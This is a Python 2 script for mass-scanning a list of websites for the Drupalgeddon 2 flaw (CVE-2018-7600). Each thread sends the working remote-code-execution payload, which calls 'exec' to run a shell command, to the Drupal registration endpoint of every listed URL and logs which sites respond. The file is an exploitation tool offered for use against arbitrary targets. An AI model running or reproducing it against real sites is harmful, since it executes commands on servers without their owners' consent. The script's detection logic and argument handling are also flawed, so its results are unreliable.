#!/usr/bin/python

import requests
import threading
import Queue
import sys
import time
import argparse
import os
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


#Drupal Drupalgeddon 2
#(SA-CORE-2018-002 / CVE-2018-7600)
#Exploit by Dan Sharvit - (Shlacky) - Cynoia.com linkedin.com/in/dansharv
#https://github.com/sl4cky/CVE-2018-7600
#mass vulnerability checker


G = '\033[92m'  # green
Y = '\033[93m'  # yellow
B = '\033[94m'  # blue
R = '\033[91m'  # red
W = '\033[0m'   # white

def parse_args():
    # parse the arguments
    parser = argparse.ArgumentParser(epilog='')
    parser._optionals.title = "OPTIONS"
    parser.add_argument('-f', '--file', help="file with urls to test", required=True)
    parser.add_argument('-o', '--output', help="output to write vulnerable servers", required=False)
    parser.add_argument('-t', '--threads', help="amount of threads", required=False, default=10)
    return parser.parse_args()


class exploit(threading.Thread):

	def __init__(self,queue):
		threading.Thread.__init__(self)
		self.queue = queue


	def write_to_file(self,url):
		with open(output,'a+') as f:
			f.write(url + "\n")
			f.close()

	
	def check_url(self,url):
		target_url = "{}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax".format(url)
		try:
			r = requests.post(target_url, headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}, data={"form_id": "user_register_form", "_drupal_ajax": "1", "mail[#post_render][]": "exec", "mail[#type]": "markup", "mail[#markup]": "echo 'hehe'"})
			if r.status_code == 200:
				print "{}[!] {} is vulnerable{}".format(R,url,W)
				if output:
					self.write_to_file(url)
			else:
				print "[*] - Testing {}".format(url)
		except:
			"[*] An error occured"
			sys.exit(1)


	def run(self):
		while True:
			try:
				url = self.queue.get(timeout=0.2)
			except:
				continue
			
			self.check_url(url)

			self.queue.task_done()


def main():
	queue = Queue.Queue()

	if os.path.isfile(file) == False:
		print "[*] Your inputfile doesn't exist"
		sys.exit(1)

	global urls
	urls = open(file, 'r').read().splitlines()

	for i in range(threads):
		t = exploit(queue)
		t.setDaemon(True)
		t.start()

	for url in urls:
		queue.put(url)

	queue.join()



if __name__ == '__main__':
	args = parse_args()
	file = args.file
	threads = args.threads
	output = args.output
main()